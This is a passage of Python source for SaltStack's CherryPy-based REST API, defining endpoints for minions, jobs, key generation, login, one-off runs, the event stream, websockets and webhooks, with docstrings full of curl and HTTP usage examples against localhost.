token=cherrypy.session.get('token')))
}
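# Illustrative client sketch (assumptions for illustration only: the third-party
# `requests` package and example host/credentials): log in via /login, then POST
# a lowstate list to this root URL reusing the session cookie CherryPy sets.
#
#   import requests
#   s = requests.Session()
#   s.headers['Accept'] = 'application/json'
#   s.post('http://localhost:8000/login',
#          data={'username': 'saltdev', 'password': 'saltdev', 'eauth': 'pam'})
#   ret = s.post('http://localhost:8000',
#                json=[{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}])
#   print(ret.json())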
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
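# Illustrative sketch (assumes `requests` and a valid session token such as the
# docstring's d40d1e1e) of the async workflow this class enables: POST /minions
# to start a job, then poll /jobs/<jid> for the result.
#
#   import requests
#   s = requests.Session()
#   s.headers.update({'X-Auth-Token': 'd40d1e1e', 'Accept': 'application/json'})
#   job = s.post('http://localhost:8000/minions',
#                data={'tgt': '*', 'fun': 'test.ping'}).json()
#   jid = job['return'][0]['jid']
#   result = s.get('http://localhost:8000/jobs/{0}'.format(jid)).json()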
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups'] is not False:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
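# Illustrative note (example config values only) on the permission merge done in
# Login.POST above: user-specific perms, '*' perms, and '%'-suffixed group perms
# from the master's external_auth section are combined.
#
#   eauth = {
#       'fred': ['test.*'],       # user-specific
#       '*': ['status.ping'],     # applies to every user
#       'admins%': ['.*'],        # applies to members of the 'admins' group
#   }
#   # For user 'fred' in group 'admins', the code above yields
#   # perms == ['test.*', 'status.ping', '.*']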
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
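# Illustrative consumer sketch (assumes `requests` and the docstring's example
# token) showing the SSE stream parsed from Python rather than JavaScript or
# the shell:
#
#   import json
#   import requests
#   resp = requests.get('http://localhost:8000/events',
#                       params={'token': '308650d'}, stream=True)
#   for line in resp.iter_lines(decode_unicode=True):
#       if line.startswith('data: '):
#           event = json.loads(line[len('data: '):])
#           print(event['tag'], event['data'])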
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
The examples above show how to establish a websocket connection to Salt and
activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason, authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
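# Illustrative sender sketch (assumes `requests` and that webhook auth is left
# enabled): an external service firing this hook with a JSON payload, producing
# the salt/netapi/hook/mycompany/build/success event described above.
#
#   import requests
#   requests.post('http://localhost:8000/hook/mycompany/build/success',
#                 headers={'X-Auth-Token': 'd40d1e1e'},
#                 json={'revision': 'aa22a3c4b2e7', 'result': True})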
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
